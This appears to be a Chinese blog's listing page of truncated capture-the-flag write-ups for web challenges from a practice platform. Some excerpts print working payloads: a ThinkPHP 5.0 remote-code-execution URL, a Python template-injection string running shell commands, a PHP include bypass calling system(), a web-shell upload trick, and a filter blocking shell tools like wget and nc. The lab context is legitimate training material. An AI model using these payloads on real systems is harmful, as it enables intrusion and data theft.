攻防sj
墨明丿
这个作者很懒,什么都没留下…
展开
-
(攻防sj)web-bug
打开如下,为登录界面任意用账户123 密码123注册完 登录进去发现进去管理模块需要管理员账户通过修改密码的功能 抓包将账户改成admin然后就可以登录管理员账户但是仍然无法进入管理页面,发ip验证错误可以使用X-Forwarded-For请求头,而管理员一班本地登录使用X-Forwarded-For:127.0.0.1发现提示<!-- index.php?module=filemanage&do=???-->这里上网查找得知,根据 filema.原创 2021-01-10 02:24:35 · 118 阅读 · 0 评论 -
(攻防sj)web-lottery
点开发现是个彩票游戏网站根据游戏规则 ,根据输入的字符串,和获奖号码比较相同的号码的数量,相同越多,奖金越多最后用奖金买flag附件里给了源码,读码发现关键部分如下而 == 为弱类型比较我们利用当其中一个为布尔值true时,另一个也会转换为布尔值true ,除非是0因此利用burp修改number值为7个true得到重复几次后就可以购买flag成功!关于php弱类型比较时不同数值类型的转换:https://www.php.cn/php-weizijiaoche.原创 2021-01-09 23:22:09 · 113 阅读 · 1 评论 -
(攻防sj)web -favorite_number
打开如下得到源码 <?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ if (!preg_match("/sh|wget|nc|python|php|p.原创 2021-01-09 22:11:30 · 167 阅读 · 0 评论 -
(攻防sj)web-easytornado
三个文件 依次查看得知,flag所在url由 filename和filehash组成file为 /fllllllllllllag哈希值为 cookie密钥 + 文件名 md5加密获得且发现,若哈希值与文件名不符,进入第四个页面,错误页面并发现此页面存在模板注入render为Python的渲染函数,且有关于于cookie_secret密钥存放于application.settings 中模板注入,发现无法进入但是由于render() 允许 别名参考torna.原创 2020-12-30 11:18:11 · 97 阅读 · 0 评论 -
(攻防sj)web Web_php_unserialize
打开如下依然是需要利用 unserialize()和wakeup()传参时的漏洞,即,当传输的序列码中属性值的大小大于真实属性的数量时,会跳过wakeup()。上个问题已经了解了见链接:(https://blog.csdn.net/weixin_45344309/article/details/111385926)源码注释提示flag在 fl4g.php,可以传输fl4g.php但是他对传输的序列码作为正则表达式进行了过滤 if (preg_match('/[oc]:\d+:/i', $var.原创 2020-12-18 22:14:04 · 143 阅读 · 1 评论 -
(攻防sj)web unserialize3
打开如图注意到题目 反序列化函数 unserialize 和 代码内初始化函数 wakeup()如果一个类定义了__wakup()和__destruct(),则该类的实例被反序列化时,会自动调用__wakeup(), 生命周期结束时,则调用__desturct()。而,这两个函数存在漏洞,运行如下其中O:4:"xctf":1:{s:4:"flag";s:3:"111";}xctf后面的 1 代表此对象中存在 1 个属性 ,若将其,修改,使得大于其真实属性数量,则跳过此函数。若输入正确序.原创 2020-12-18 19:38:26 · 147 阅读 · 1 评论 -
(攻防sj)web -web2
打开如图这是加密代码,逆向解密即可substr 查找 ord 转ASCII码 chr ASCII转回来str_rot13 字母序列向后推13位,再次调用变回原来strrev 倒序输出 base64_encode base加密解密代码如下 <?php$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $q=base64_decode(strrev(str_rot13($miwen)).原创 2020-12-18 16:30:48 · 178 阅读 · 1 评论 -
(攻防sj)web PHP2
进入 如图扫描得到点开 index.phps即<?phpif("admin"===$_GET[id]) {echo("<p>not allowed!</p>");exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "admin"){echo "<p>Access granted!</p>";echo "<p>Key: xxxxxxx </p.原创 2020-12-16 09:56:47 · 100 阅读 · 0 评论 -
(攻防sj)web php_rce
打开如图此框架旧版本存在严重漏洞前往github搜索漏洞选取5.0版本显示版本为5.0.20选取5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id前面的 http://localhost/thinkphp_5.0.21 为靶场地址,不用用ls查看目录没有flag,向上级目录依次找找到fl.原创 2020-12-16 08:41:56 · 77 阅读 · 0 评论 -
(攻防sj)Web_php_include
网页打开如下strstr函数:查找字符串首次出现位置,返回字符串剩余部分str_replace:将字符串替代为另一字符串,但是区分大小写即查找“php://”首次出现将其替代为空,即拦截了/?page=php:// 这种传输一、post请求将php 换为PHP 或Php 都可以绕过筛选<?phpsystem("ls")?><?phpsystem("cat fl4gisisish3r3.php")?>找到flag二、data伪协议传输虽然过滤ph原创 2020-12-09 13:01:03 · 138 阅读 · 1 评论 -
(攻防sj)web-upload1
打开如下想到上传木马查看源码只能上传jpg和png文件将木马后缀改为jpg再用burp 修改后缀为php 发送用蚁剑链接,找到flag文件原创 2020-12-09 09:53:29 · 63 阅读 · 0 评论 -
(攻防sj)Web_python_template_injection(模板注入)
打开如图提示Python模板注入输入{{1+1}}验证确实存在模板注入调用os模块的popen执行ls打印所有文件{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("ls").read()}}找到flag ,把它读出来{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].popen("cat fl原创 2020-12-07 09:37:28 · 127 阅读 · 0 评论 -
(攻防sj)web ics-06
点开如图仅有一处可进入只有id可传参尝试sql注入无效针对id直接爆破成功原创 2020-12-16 11:06:26 · 66 阅读 · 0 评论 -
(攻防sj) web NaNNaNNaNNaN-Batman
下载附件打开如下查看源码函数为乱码打开记事本,将 最后的执行函数eval 改为弹窗alert得到源码整理如下function $(){var e=document.getElementById("c").value;if(e.length==16)if(e.match(/^be0f23/)!=null)if(e.match(/233ac/)!=null)if(e.match(/e98aa$/)!=null)if(e.match(/c7be9/)!=null){var t.原创 2020-12-16 19:09:51 · 208 阅读 · 0 评论